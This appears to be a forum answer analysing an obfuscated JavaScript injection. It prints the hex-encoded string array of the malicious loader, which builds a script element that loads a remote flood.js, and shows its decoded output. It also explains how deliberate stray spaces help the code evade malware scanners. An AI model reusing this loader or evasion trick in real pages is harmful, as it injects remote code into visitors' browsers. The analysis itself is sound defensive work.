I opened firebug and pasted the script part into the console (I tried to only insert the part that created the variable and not run the code). This is what I got:
what i inserted:
console.log(["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"]);
result:
["src", "script", "cx7 2eateElement", "x 68ttp://ug-rad io.co.cc/flox 6Fd.js", "appendC x68ild", "body"]
In short, it looks like a script to download an external Javascript file from a remote server with a very ingenious domain name.
There are several characters that do not convert completely as you expected. This could be a typo (unlikely) or deliberate further obfuscation to trick any automatic malware scanner that looks for scripts containing URLs or links to createElement , etc. The rest of the script corrects these characters in place separately before running.
The variable name _0x8dd5 chosen to look like hexadecimal code and make it all more difficult to read, but in fact it is just the usual Javascript variable name. It is referenced repeatedly in the rest of the script as it copies characters from one part of the string to another in order to fix intentional spaces.
Definitely a malicious script.
I recommend to burn it immediately !; -)
Spudley
source share